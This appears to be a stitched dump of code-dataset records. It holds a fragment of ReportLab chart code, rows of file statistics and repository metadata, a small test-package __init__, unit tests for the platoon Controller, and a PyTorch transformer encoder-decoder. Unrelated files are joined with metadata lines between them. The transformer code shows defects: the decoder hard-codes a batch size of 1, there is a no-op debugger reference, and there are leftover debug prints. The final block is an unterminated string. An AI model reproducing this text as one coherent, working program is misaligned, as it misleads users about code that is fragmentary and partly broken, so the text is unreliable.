self.add(Line(50,50,50,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,50,45,50,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,67.85714,45,67.85714,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,85.71429,45,85.71429,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,103.5714,45,103.5714,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,121.4286,45,121.4286,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,139.2857,45,139.2857,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,157.1429,45,157.1429,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,175,45,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,50)
v0.add(String(-5,-4,'0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,67.85714)
v0.add(String(-5,-4,'1',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,85.71429)
v0.add(String(-5,-4,'2',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,103.5714)
v0.add(String(-5,-4,'3',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,121.4286)
v0.add(String(-5,-4,'4',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,139.2857)
v0.add(String(-5,-4,'5',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,157.1429)
v0.add(String(-5,-4,'6',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,175)
v0.add(String(-5,-4,'7',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(PolyLine(points=[110,67.85714,170,85.71429,200,67.85714,230,103.5714,290,139.2857],strokeColor=Color(1,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=1,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(PolyLine(points=[110,85.71429,170,103.5714,200,85.71429,260,139.2857,290,157.1429],strokeColor=Color(0,0,1,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=1,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(110,67.85714,2.5,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(170,85.71429,2.5,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(200,67.85714,2.5,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(230,103.5714,2.5,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(290,139.2857,2.5,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,110,77.85714)
v0.add(String(-3.75,-4,' 1',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,170,95.71429)
v0.add(String(-3.75,-4,' 2',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,200,77.85714)
v0.add(String(-3.75,-4,' 1',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,230,113.5714)
v0.add(String(-3.75,-4,' 3',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,290,149.2857)
v0.add(String(-3.75,-4,' 5',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(Circle(110,85.71429,2.5,fillColor=Color(0,0,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(170,103.5714,2.5,fillColor=Color(0,0,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(200,85.71429,2.5,fillColor=Color(0,0,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(260,139.2857,2.5,fillColor=Color(0,0,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Circle(290,157.1429,2.5,fillColor=Color(0,0,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,110,95.71429)
v0.add(String(-3.75,-4,' 2',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,170,113.5714)
v0.add(String(-3.75,-4,' 3',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,200,95.71429)
v0.add(String(-3.75,-4,' 2',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,260,149.2857)
v0.add(String(-3.75,-4,' 5',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,290,167.1429)
v0.add(String(-3.75,-4,' 6',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
if __name__=="__main__": #NORUNTESTS
ExplodedDrawing_Drawing().save(formats=['pdf'],outDir='.',fnRoot=None)
| 88.903509 | 228 | 0.752047 | 1,710 | 10,135 | 4.431579 | 0.061988 | 0.036949 | 0.034838 | 0.05384 | 0.900238 | 0.879124 | 0.868435 | 0.858934 | 0.853655 | 0.852864 | 0 | 0.139274 | 0.040059 | 10,135 | 113 | 229 | 89.690265 | 0.639634 | 0.005525 | 0 | 0.302752 | 1 | 0 | 0.043862 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009174 | false | 0 | 0.018349 | 0 | 0.036697 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8ce3c2efe1948a109dcc2c7ff0df11f6d514e2e7 | 230 | py | Python | depimpact/tests/__init__.py | NazBen/dep-impact | 284e72bccfb6309110df5191dfae3c0a93ce813b | [
"MIT"
] | null | null | null | depimpact/tests/__init__.py | NazBen/dep-impact | 284e72bccfb6309110df5191dfae3c0a93ce813b | [
"MIT"
] | null | null | null | depimpact/tests/__init__.py | NazBen/dep-impact | 284e72bccfb6309110df5191dfae3c0a93ce813b | [
"MIT"
] | null | null | null | """
"""
from .test_functions import func_overflow, margins_overflow, var_names_overflow, func_sum, multi_output_func_sum
__all__ = ["func_overflow", "margins_overflow", "var_names_overflow", "func_sum", "multi_output_func_sum"]
| 38.333333 | 112 | 0.795652 | 32 | 230 | 5.09375 | 0.4375 | 0.171779 | 0.233129 | 0.331288 | 0.834356 | 0.834356 | 0.834356 | 0.834356 | 0.834356 | 0.834356 | 0 | 0 | 0.078261 | 230 | 5 | 113 | 46 | 0.764151 | 0 | 0 | 0 | 0 | 0 | 0.342342 | 0.094595 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.5 | null | null | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 11 |
50f9c46d6503a2e7ce6e3a3f112d8bf5cabb8aa4 | 6,434 | py | Python | platoon/tests/unit/test_controller.py | mila-udem/platoon | 4cd26f4235da06967e20679e4cf769b423269165 | [
"MIT"
] | 212 | 2015-12-18T20:21:44.000Z | 2018-12-05T01:54:18.000Z | platoon/tests/unit/test_controller.py | mila-iqia/platoon | 4cd26f4235da06967e20679e4cf769b423269165 | [
"MIT"
] | 80 | 2015-12-18T18:59:00.000Z | 2018-08-13T07:17:46.000Z | platoon/tests/unit/test_controller.py | mila-iqia/platoon | 4cd26f4235da06967e20679e4cf769b423269165 | [
"MIT"
] | 51 | 2015-12-18T19:03:40.000Z | 2018-12-06T02:12:04.000Z | from __future__ import absolute_import
import six
import unittest
from ...channel import controller
if six.PY3:
buffer_ = memoryview
else:
buffer_ = buffer # noqa
class TestController(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.local_size = 3
cls.devices = ["cuda0", "cuda1", "cuda2"]
cls.control = controller.Controller(5567, devices=cls.devices)
@classmethod
def tearDownClass(cls):
cls.control._close()
def test_is_worker_first(self):
first = self.control._is_worker_first(self.control._am_i_first_count)
assert first
first = self.control._is_worker_first(self.control._am_i_first_count)
assert not first
first = self.control._is_worker_first(self.control._am_i_first_count)
assert not first
first = self.control._is_worker_first(self.control._am_i_first_count)
assert first
first = self.control._is_worker_first(self.control._am_i_first_count)
assert not first
first = self.control._is_worker_first(self.control._am_i_first_count)
assert not first
def test_get_platoon_info(self):
req_info = {}
req_info['local_id'] = '1'
req_info['device'] = 'cuda0'
res = self.control._get_platoon_info(req_info)
assert set(res.keys()) == set(['local_id', 'local_size', 'local_rank', 'multinode', 'global_size', 'global_rank'])
assert res['local_id'] == "platoon-1"
assert res['local_size'] == self.local_size
assert res['local_rank'] == 0
assert not res['multinode']
assert res['global_size'] == self.local_size
req_info['local_id'] = '2'
req_info['device'] = 'cuda1'
res = self.control._get_platoon_info(req_info)
assert set(res.keys()) == set(['local_id', 'local_size', 'local_rank', 'multinode', 'global_size', 'global_rank'])
assert res['local_id'] == "platoon-1"
assert res['local_size'] == self.local_size
assert res['local_rank'] == 1
assert not res['multinode']
assert res['global_size'] == self.local_size
req_info['local_id'] = '3'
req_info['device'] = 'cuda2'
res = self.control._get_platoon_info(req_info)
assert set(res.keys()) == set(['local_id', 'local_size', 'local_rank', 'multinode', 'global_size', 'global_rank'])
assert res['local_id'] == "platoon-1"
assert res['local_size'] == self.local_size
assert res['local_rank'] == 2
assert not res['multinode']
assert res['global_size'] == self.local_size
req_info['local_id'] = 'asdfasfda'
req_info['device'] = 'cuda1'
res = self.control._get_platoon_info(req_info)
assert set(res.keys()) == set(['local_id', 'local_size', 'local_rank', 'multinode', 'global_size', 'global_rank'])
assert res['local_id'] == "platoon-asdfasfda"
assert res['local_size'] == self.local_size
assert res['local_rank'] == 1
assert not res['multinode']
assert res['global_size'] == self.local_size
def test_init_new_shmem(self):
self.control._job_uid = "yo"
req_info = {'size': 64}
res = self.control._init_new_shmem(req_info)
assert res == "platoon-yo_0_buffer"
assert len(self.control.shared_buffers) == 1
assert len(self.control._shmrefs) == 1
assert self.control._last_shmem_name == "platoon-yo_0_buffer"
a = self.control.shared_buffers[res]
try:
buffer_(a)
except TypeError:
self.fail("self.control.shared_buffers[{}] does not provide buffer interface.".format(0))
assert len(a) == 64
res = self.control._init_new_shmem(req_info)
assert res == "platoon-yo_0_buffer"
assert len(self.control.shared_buffers) == 1
assert len(self.control._shmrefs) == 1
assert self.control._last_shmem_name == "platoon-yo_0_buffer"
b = self.control.shared_buffers[res]
try:
buffer_(b)
except TypeError:
self.fail("self.control.shared_buffers[{}] does not provide buffer interface.".format(0))
assert len(b) == 64
assert b == a
res = self.control._init_new_shmem(req_info)
assert res == "platoon-yo_0_buffer"
assert len(self.control.shared_buffers) == 1
assert len(self.control._shmrefs) == 1
assert self.control._last_shmem_name == "platoon-yo_0_buffer"
c = self.control.shared_buffers[res]
try:
buffer_(c)
except TypeError:
self.fail("self.control.shared_buffers[{}] does not provide buffer interface.".format(0))
assert len(c) == 64
assert c == a
req_info = {'size': 512}
res = self.control._init_new_shmem(req_info)
assert res == "platoon-yo_1_buffer"
assert len(self.control.shared_buffers) == 2
assert len(self.control._shmrefs) == 2
assert self.control._last_shmem_name == "platoon-yo_1_buffer"
e = self.control.shared_buffers[res]
try:
buffer_(e)
except TypeError:
self.fail("self.control.shared_buffers[{}] does not provide buffer interface.".format(1))
assert len(e) == 512
assert e != c
res = self.control._init_new_shmem(req_info)
assert res == "platoon-yo_1_buffer"
assert len(self.control.shared_buffers) == 2
assert len(self.control._shmrefs) == 2
assert self.control._last_shmem_name == "platoon-yo_1_buffer"
f = self.control.shared_buffers[res]
try:
buffer_(f)
except TypeError:
self.fail("self.control.shared_buffers[{}] does not provide buffer interface.".format(1))
assert len(f) == 512
assert f != c
assert f == e
res = self.control._init_new_shmem(req_info)
assert res == "platoon-yo_1_buffer"
assert len(self.control.shared_buffers) == 2
assert len(self.control._shmrefs) == 2
assert self.control._last_shmem_name == "platoon-yo_1_buffer"
g = self.control.shared_buffers[res]
try:
buffer_(g)
except TypeError:
self.fail("self.control.shared_buffers[{}] does not provide buffer interface.".format(1))
assert len(g) == 512
assert g != c
assert g == e
| 39.231707 | 122 | 0.624029 | 834 | 6,434 | 4.534772 | 0.103118 | 0.154151 | 0.08091 | 0.114225 | 0.840561 | 0.840561 | 0.840561 | 0.783448 | 0.783448 | 0.783448 | 0 | 0.01518 | 0.252565 | 6,434 | 163 | 123 | 39.472393 | 0.771262 | 0.000622 | 0 | 0.613793 | 0 | 0 | 0.188083 | 0.028936 | 0 | 0 | 0 | 0 | 0.462069 | 1 | 0.034483 | false | 0 | 0.027586 | 0 | 0.068966 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e863d663bac8af39bd280b8e8f07c8b2e47d0946 | 32,073 | py | Python | seq_sum copy.py | VinACE/trans-vsumm | d3b03fbe09f6d38b9a59ad9b8ceaa732c4f7340a | [
"MIT"
] | 2 | 2020-08-21T06:29:18.000Z | 2020-09-27T00:40:31.000Z | seq_sum copy.py | VinACE/trans-vsumm | d3b03fbe09f6d38b9a59ad9b8ceaa732c4f7340a | [
"MIT"
] | null | null | null | seq_sum copy.py | VinACE/trans-vsumm | d3b03fbe09f6d38b9a59ad9b8ceaa732c4f7340a | [
"MIT"
] | 1 | 2021-04-10T11:50:12.000Z | 2021-04-10T11:50:12.000Z | """
# https://github.com/bentrevett/pytorch-seq2seq/issues/129
# https://github.com/bentrevett/pytorch-seq2seq/blob/master/6%20-%20Attention%20is%20All%20You%20Need.ipynb
"""
import torch
import torch.nn as nn
import torch.optim as optim
import torchtext
from torchtext.datasets import Multi30k
from torchtext.data import Field, BucketIterator
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import spacy
import numpy as np
import random
import math
import time
from IPython.core.debugger import set_trace #set_trace()
######## ENCODER PART #################################
class Encoder(nn.Module):
def __init__(self,
input_dim,
hid_dim,
n_layers,
n_heads,
pf_dim,
dropout,
device,
max_length = 1024):
super().__init__()
self.device = device
self.tok_embedding = nn.Embedding(input_dim, hid_dim)
# self.pos_embedding = nn.Embedding(max_length, hid_dim)
self.layers = nn.ModuleList([EncoderLayer(hid_dim,
n_heads,
pf_dim,
dropout,
device)
for _ in range(n_layers)])
self.dropout = nn.Dropout(dropout)
self.scale = torch.sqrt(torch.FloatTensor([hid_dim])).to(device)
def forward(self, src, src_mask):
#src = [batch size, src len]
#src_mask = [batch size, src len]
batch_size = src.shape[0]
# batch_size = 1
src_len = src.shape[1]
pos = torch.arange(0, src_len).unsqueeze(0).repeat(batch_size, 1).to(self.device)
#pos = [batch size, src len]
src = torch.tensor(src).to(self.device).long()
src = self.dropout((self.tok_embedding(src) * self.scale)) # + self.pos_embedding(pos))
#src = [batch size, src len, hid dim]
for layer in self.layers:
src = layer(src, src_mask)
#src = [batch size, src len, hid dim]
return src
class EncoderLayer(nn.Module):
def __init__(self,
hid_dim,
n_heads,
pf_dim,
dropout,
device):
super().__init__()
self.self_attn_layer_norm = nn.LayerNorm(hid_dim)
self.ff_layer_norm = nn.LayerNorm(hid_dim)
self.self_attention = MultiHeadAttentionLayer(hid_dim, n_heads, dropout, device)
self.positionwise_feedforward = PositionwiseFeedforwardLayer(hid_dim,
pf_dim,
dropout)
self.dropout = nn.Dropout(dropout)
def forward(self, src, src_mask):
#src = [batch size, src len, hid dim]
#src_mask = [batch size, src len]
#self attention
_src, _ = self.self_attention(src, src, src, src_mask)
#dropout, residual connection and layer norm
src = self.self_attn_layer_norm(src + self.dropout(_src))
#src = [batch size, src len, hid dim]
#positionwise feedforward
_src = self.positionwise_feedforward(src)
#dropout, residual and layer norm
src = self.ff_layer_norm(src + self.dropout(_src))
#src = [batch size, src len, hid dim]
return src
#### ATTENTION LAYER #################################################################
class MultiHeadAttentionLayer(nn.Module):
def __init__(self, hid_dim, n_heads, dropout, device):
super().__init__()
assert hid_dim % n_heads == 0
self.hid_dim = hid_dim
self.n_heads = n_heads
self.head_dim = hid_dim // n_heads
self.fc_q = nn.Linear(hid_dim, hid_dim)
self.fc_k = nn.Linear(hid_dim, hid_dim)
self.fc_v = nn.Linear(hid_dim, hid_dim)
self.fc_o = nn.Linear(hid_dim, hid_dim)
self.dropout = nn.Dropout(dropout)
self.scale = torch.sqrt(torch.FloatTensor([self.head_dim])).to(device)
def forward(self, query, key, value, mask = None):
batch_size = query.shape[0]
# batch_size = 1
#query = [batch size, query len, hid dim]
#key = [batch size, key len, hid dim]
#value = [batch size, value len, hid dim]
Q = self.fc_q(query)
K = self.fc_k(key)
V = self.fc_v(value)
#Q = [batch size, query len, hid dim]
#K = [batch size, key len, hid dim]
#V = [batch size, value len, hid dim]
Q = Q.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3)
K = K.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3)
V = V.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3)
#Q = [batch size, n heads, query len, head dim]
#K = [batch size, n heads, key len, head dim]
#V = [batch size, n heads, value len, head dim]
print("**********************************")
print(f' Shape of Q is {Q.shape}')
print("**********************************")
print(f' Shape of K is {K.shape}')
energy = torch.matmul(Q, K.permute(0, 1, 3, 2)) / self.scale
#energy = [batch size, n heads, query len, key len]
import pdb;pdb.set_trace
print("**********************************")
print(f' Shape of mask is {mask.shape}')
print("**********************************")
print(f' Shape of Energy is {energy.shape}')
if mask is not None:
energy = energy.masked_fill(mask == 0, -1e10)
attention = torch.softmax(energy, dim = -1)
#attention = [batch size, n heads, query len, key len]
x = torch.matmul(self.dropout(attention), V)
#x = [batch size, n heads, query len, head dim]
x = x.permute(0, 2, 1, 3).contiguous()
#x = [batch size, query len, n heads, head dim]
x = x.view(batch_size, -1, self.hid_dim)
#x = [batch size, query len, hid dim]
x = self.fc_o(x)
#x = [batch size, query len, hid dim]
return x, attention
class PositionwiseFeedforwardLayer(nn.Module):
def __init__(self, hid_dim, pf_dim, dropout):
super().__init__()
self.fc_1 = nn.Linear(hid_dim, pf_dim)
self.fc_2 = nn.Linear(pf_dim, hid_dim)
self.dropout = nn.Dropout(dropout)
def forward(self, x):
#x = [batch size, seq len, hid dim]
x = self.dropout(torch.relu(self.fc_1(x)))
#x = [batch size, seq len, pf dim]
x = self.fc_2(x)
#x = [batch size, seq len, hid dim]
return x
###### decoder part ###############
class Decoder(nn.Module):
def __init__(self,
output_dim,
hid_dim,
n_layers,
n_heads,
pf_dim,
dropout,
device,
max_length = 1024):
super().__init__()
self.device = device
self.tok_embedding = nn.Embedding(output_dim, hid_dim)
# self.pos_embedding = nn.Embedding(max_length, hid_dim)
self.layers = nn.ModuleList([DecoderLayer(hid_dim,
n_heads,
pf_dim,
dropout,
device)
for _ in range(n_layers)])
self.fc_out = nn.Linear(hid_dim, output_dim)
self.dropout = nn.Dropout(dropout)
self.scale = torch.sqrt(torch.FloatTensor([hid_dim])).to(device)
def forward(self, trg, enc_src, trg_mask, src_mask):
#trg = [batch size, trg len]
#enc_src = [batch size, src len, hid dim]
#trg_mask = [batch size, trg len]
#src_mask = [batch size, src len]
# batch_size = trg.shape[0]
batch_size = 1
trg_len = trg.shape[1]
pos = torch.arange(0, trg_len).unsqueeze(0).repeat(batch_size, 1).to(self.device)
#pos = [batch size, trg len]
trg = self.dropout((self.tok_embedding(trg) * self.scale)) # + self.pos_embedding(pos))
#trg = [batch size, trg len, hid dim]
for layer in self.layers:
trg, attention = layer(trg, enc_src, trg_mask, src_mask)
#trg = [batch size, trg len, hid dim]
#attention = [batch size, n heads, trg len, src len]
output = self.fc_out(trg)
#output = [batch size, trg len, output dim]
return output, attention
############# decoder Layer #################################
class DecoderLayer(nn.Module):
def __init__(self,
hid_dim,
n_heads,
pf_dim,
dropout,
device):
super().__init__()
self.self_attn_layer_norm = nn.LayerNorm(hid_dim)
self.enc_attn_layer_norm = nn.LayerNorm(hid_dim)
self.ff_layer_norm = nn.LayerNorm(hid_dim)
self.self_attention = MultiHeadAttentionLayer(hid_dim, n_heads, dropout, device)
self.encoder_attention = MultiHeadAttentionLayer(hid_dim, n_heads, dropout, device)
self.positionwise_feedforward = PositionwiseFeedforwardLayer(hid_dim,
pf_dim,
dropout)
self.dropout = nn.Dropout(dropout)
def forward(self, trg, enc_src, trg_mask, src_mask):
#trg = [batch size, trg len, hid dim]
#enc_src = [batch size, src len, hid dim]
#trg_mask = [batch size, trg len]
#src_mask = [batch size, src len]
#self attention
_trg, _ = self.self_attention(trg, trg, trg, trg_mask)
#dropout, residual connection and layer norm
trg = self.self_attn_layer_norm(trg + self.dropout(_trg))
#trg = [batch size, trg len, hid dim]
#encoder attention
_trg, attention = self.encoder_attention(trg, enc_src, enc_src, src_mask)
#dropout, residual connection and layer norm
trg = self.enc_attn_layer_norm(trg + self.dropout(_trg))
#trg = [batch size, trg len, hid dim]
#positionwise feedforward
_trg = self.positionwise_feedforward(trg)
#dropout, residual and layer norm
trg = self.ff_layer_norm(trg + self.dropout(_trg))
#trg = [batch size, trg len, hid dim]
#attention = [batch size, n heads, trg len, src len]
return trg, attention
class Seq2Seq(nn.Module):
def __init__(self,
encoder,
decoder,
src_pad_idx,
trg_pad_idx,
device):
super().__init__()
self.encoder = encoder
self.decoder = decoder
self.src_pad_idx = src_pad_idx
self.trg_pad_idx = trg_pad_idx
self.device = device
def make_src_mask(self, src):
#src = [batch size, src len]
src_mask = (src != self.src_pad_idx).unsqueeze(1).unsqueeze(2)
#src_mask = [batch size, 1, 1, src len]
return src_mask
def make_trg_mask(self, trg):
#trg = [batch size, trg len]
trg_pad_mask = (trg != self.trg_pad_idx).unsqueeze(1).unsqueeze(2)
#trg_pad_mask = [batch size, 1, 1, trg len]
trg_len = trg.shape[1]
trg_sub_mask = torch.tril(torch.ones((trg_len, trg_len), device = self.device)).bool()
#trg_sub_mask = [trg len, trg len]
trg_mask = trg_pad_mask & trg_sub_mask
#trg_mask = [batch size, 1, trg len, trg len]
return trg_mask
def forward(self, src, trg):
#src = [batch size, src len]
#trg = [batch size, trg len]
src_mask = self.make_src_mask(src)
trg_mask = self.make_trg_mask(trg)
#src_mask = [batch size, 1, 1, src len]
#trg_mask = [batch size, 1, trg len, trg len]
enc_src = self.encoder(src, src_mask)
#enc_src = [batch size, src len, hid dim]
output, attention = self.decoder(trg, enc_src, trg_mask, src_mask)
#output = [batch size, trg len, output dim]
#attention = [batch size, n heads, trg len, src len]
return output, attention
# if __name__ == "__main__":
# set_trace()
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# x = torch.tensor([[1, 5, 6, 4, 3, 9, 5, 2, 0], [1, 8, 7, 3, 4, 5, 6, 7, 2]]).to(
# device
# )
# trg = torch.tensor([[1, 7, 4, 3, 5, 9, 2, 0], [1, 5, 6, 2, 4, 7, 6, 2]]).to(device)
# src_pad_idx = 0
# trg_pad_idx = 0
# src_vocab_size = 10
# trg_vocab_size = 10
# model = Transformer(src_vocab_size, trg_vocab_size, src_pad_idx, trg_pad_idx).to(
# device
# )
# out, attention = model(x, trg[:, :-1])
# print(out.shape)
# INPUT_DIM = len(SRC.vocab)
# OUTPUT_DIM = len(TRG.vocab)
# if __name__ == "__main__":
# pass
'''
if __name__ == "__main__":
# set_trace()
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
INPUT_DIM = 1024
OUTPUT_DIM = 1024
HID_DIM = 256
ENC_LAYERS = 3
DEC_LAYERS = 3
ENC_HEADS = 8
DEC_HEADS = 8
ENC_PF_DIM = 1024 # try this also with 1024
DEC_PF_DIM = 1024
ENC_DROPOUT = 0.1
DEC_DROPOUT = 0.1
SRC_PAD_IDX = 0
TRG_PAD_IDX = 0
enc = Encoder(INPUT_DIM,
HID_DIM,
ENC_LAYERS,
ENC_HEADS,
ENC_PF_DIM,
ENC_DROPOUT,
device)
dec = Decoder(OUTPUT_DIM,
HID_DIM,
DEC_LAYERS,
DEC_HEADS,
DEC_PF_DIM,
DEC_DROPOUT,
device)
# src_vocab_size = 1024
# trg_vocab_size = 1024
# x = torch.tensor([[1, 5, 6, 4, 3, 9, 5, 2, 0, 0], [1, 8, 7, 3, 4, 5, 6, 7, 2, 0]]).to(
# device, dtype=torch.int64
# )
# trg = torch.tensor([[1, 7, 4, 3, 5, 9, 2, 0,0,0], [1, 5, 6, 2, 4, 7, 6, 2,0,0]]).to(device, dtype=torch.int64)
